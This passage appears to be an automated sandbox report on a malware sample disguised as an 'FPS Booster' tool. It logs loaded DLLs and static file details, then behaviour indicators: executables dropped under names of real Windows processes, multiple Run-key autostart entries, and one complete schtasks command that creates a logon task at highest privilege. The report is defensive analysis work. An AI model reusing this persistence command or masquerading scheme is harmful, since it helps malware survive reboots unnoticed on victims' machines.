                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: version.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: version.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: rasapi32.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: rasman.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: rtutils.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: mswsock.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: winhttp.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: mscoree.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: version.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: sspicli.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: wldp.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: profapi.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: amsi.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: userenv.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: rasman.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: rtutils.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: mswsock.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: winhttp.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\regedit\explorer.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\e7d19d53a5ec77aafa68c9a929149b118506bb42Jump to behavior
                    Source: UNFOT5F1qt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UNFOT5F1qt.exeStatic file information: File size 1131531 > 1048576
                    Source: UNFOT5F1qt.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: UNFOT5F1qt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb2e source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb1qt.PDB source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbx source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: RunPE_MemoryProtection.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HPOo`C:\Windows\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualStudio.Threading.pdbpdbing.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdbpdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: System.Core.pdbPSp source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: ?[oC:\Users\user\Desktop\Microsoft.VisualStudio.Threading.pdbJ source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: symbols\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualStudio.Threading.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbs source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbS source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb97` source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdbXX@ source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C41000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbLLt source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: @[o.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: UNFOT5F1qt.exeStatic PE information: 0xE61CCFF4 [Sat May 3 10:12:04 2092 UTC]
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_004011CF LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA,2_2_004011CF
                    Source: UNFOT5F1qt.exeStatic PE information: real checksum: 0xf8401 should be: 0x11d846
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F31140 pushad ; ret 0_2_00F31141
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 5_2_00007FF887B200BD pushad ; iretd 5_2_00007FF887B200C1
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeCode function: 17_2_00007FF887B3A425 push es; retn 7002h17_2_00007FF887B3A909
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeCode function: 17_2_00007FF887B401DC push es; retn 7002h17_2_00007FF887B402B9
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeCode function: 17_2_00007FF887B300BD pushad ; iretd 17_2_00007FF887B300C1
                    Source: C:\Windows\regedit\explorer.exeCode function: 18_2_00007FF887B400BD pushad ; iretd 18_2_00007FF887B400C1
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeCode function: 19_2_00007FF887B500BD pushad ; iretd 19_2_00007FF887B500C1
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeCode function: 23_2_00007FF887B2A425 push es; retn 7002h23_2_00007FF887B2A909
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeCode function: 23_2_00007FF887B3058C push es; retn 7002h23_2_00007FF887B30669
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeCode function: 23_2_00007FF887B200BD pushad ; iretd 23_2_00007FF887B200C1
                    Source: C:\Windows\regedit\explorer.exeCode function: 27_2_00007FF887C7058C push es; retn 7002h27_2_00007FF887C70669
                    Source: C:\Windows\regedit\explorer.exeCode function: 27_2_00007FF887C6A425 push es; retn 7002h27_2_00007FF887C6A909
                    Source: C:\Windows\regedit\explorer.exeCode function: 27_2_00007FF887C600BD pushad ; iretd 27_2_00007FF887C600C1
                    Source: UNFOT5F1qt.exeStatic PE information: section name: .text entropy: 7.874259568369085

                    Persistence and Installation Behavior

                    barindex
                    Creates processes via WMI
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Drops PE files with benign system names
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\regedit\explorer.exeJump to dropped file
                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: unknownExecutable created and started: C:\Windows\regedit\explorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeExecutable created and started: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Users\Default\WmiPrvSE.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\nss20C1.tmp\System.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJump to dropped file
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeFile created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\regedit\explorer.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeJump to dropped file
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeFile created: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Users\Public\Pictures\RuntimeBroker.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\ProgramData\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\ProgramData\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Users\Default\WmiPrvSE.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\regedit\explorer.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeJump to dropped file

                    Boot Survival

                    barindex
                    Creates an autostart registry key pointing to binary in C:\Windows
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WerFaultJump to behavior
                    Creates multiple autostart registry keys
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WerFaultJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                    Drops PE files to the user root directory
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Users\Default\WmiPrvSE.exeJump to dropped file
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WerFaultJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WerFaultJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTcJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
